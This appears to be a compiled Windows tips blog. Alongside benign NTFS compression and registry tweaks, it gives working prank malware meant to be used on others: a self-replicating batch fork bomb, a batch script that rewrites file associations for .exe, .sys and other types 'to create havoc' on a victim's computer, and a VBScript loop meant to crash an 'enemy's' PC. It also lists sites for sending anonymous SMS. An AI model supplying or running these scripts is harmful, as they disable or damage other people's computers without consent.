Compress drive to save disk space


Its not possible to increase ur memory size but u can compress ur data to save ur disk space, this feature is available in NTFS drive. if u have a fat or fat32 drive, u can convert it to ntfs by running a command on dos.


for c drive:
convert c:/fs:ntfs

for d drive:
convert d:/fs:ntfs

for e drive:
convert e:/fs:ntfs


run the command similarly if u have more drive...
Compresing data in NTFS

1.    open my computer

2.    select any drive(drive with NTFS format)

3.    right click and select properties

4.    click on general tab

5.    select "compress drive to save disk space"

Apply and OK

Make Virus For Fun


You can make fun with your friends. 

1.    Open Notepad.

2.    Type "start" 4 to 5 times without quote.

3.    Then type "start.bat" without quote.

4.    Save file as "anything.bat" (Here Anything is any name you want.)

5.    Now send it to your friends.


Example:-
--------------
start
start
start
start
start
start.bat


NOTE:- This is not harmful for your PC.

Send sms without registration


There are a lot of websites on the Internet that provides free sms services but only handful of them allows you to send Sms without registration and anonymously.In this post I will review the services of 4 Sms websites that allows you to send Anonymous messages.


1. Smsti.in

Smsti.in allows you send message of complete   160   words and without any ads. There message service is very fast and you can even check the delivery reports of the sms that has been sent. They provide their sms services for Indian Mobile numbers only.

2. 
Seasms.com

Seasms allows you to send messages all over the world.This is the only free Sms service that I found which all allows you to send worldwide messages anonymously. They also provide 160 character support for SMS.

3. 
Spicesms.com

Spicesms allows you to send sms only in India with 130 character support for sms.They service is very fast and sms are delivered instantaneously.

4. 
Bollywoodmotion

Bollywoodmotion is one of the best sms website as you can send sms upto 500 characters long. They do not include any ads into your message and messages are delivered in real time.This service is available only for Indian mobile numbers. If you know any other sms services that allows you to send messages without registration then do share with us by commenting.

Extension change Virus

Here I Have enclosed a simple Extension replaceable batch virus “Ext_change” Source code.

1.    Open up a Notepad and copy and paste the below code.

2.    Title Ext_Change Virus

3.    color a

4.    Rem This Virus file replaces the actual file extensions with the given extensions


@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit


5.     Save it with the extension .bat, and now you are ready to go….

6.     Execute this on Victims computer to create havoc.


Its only you who is responsible for what you do with this. we are not responsible for whatever you do with this and it is only meant for educational means.How it Works. This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…

It replaces all the text files [.txt] with the extension [.jpeg], and likewise.



Multiple Login In Yahoo Messanger

You Can Login With Multiple Id'S On The Same Yahoo Messenger Without Any Download Or Patch.
  
1.    Follow These Steps

2.    Go To Start Then Run . Type Regedit, Then Enter .

3.    Navigate To Hkey_Current_Usersoftware\Yahoo\Pager\Test

4.    On The Right Pane , Right-Click And Choose New Dword Value .

5.    Rename It As Plural.

6.     Double Click And Assign A Decimal Value Of 1.

Now Close Registry And Restart Yahoo Messenger .For Signing In With New Email ID

Crash Your Or Your Friend Computer



Use this on your own responsibility



Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs and send it to your enemy.never double-click this file..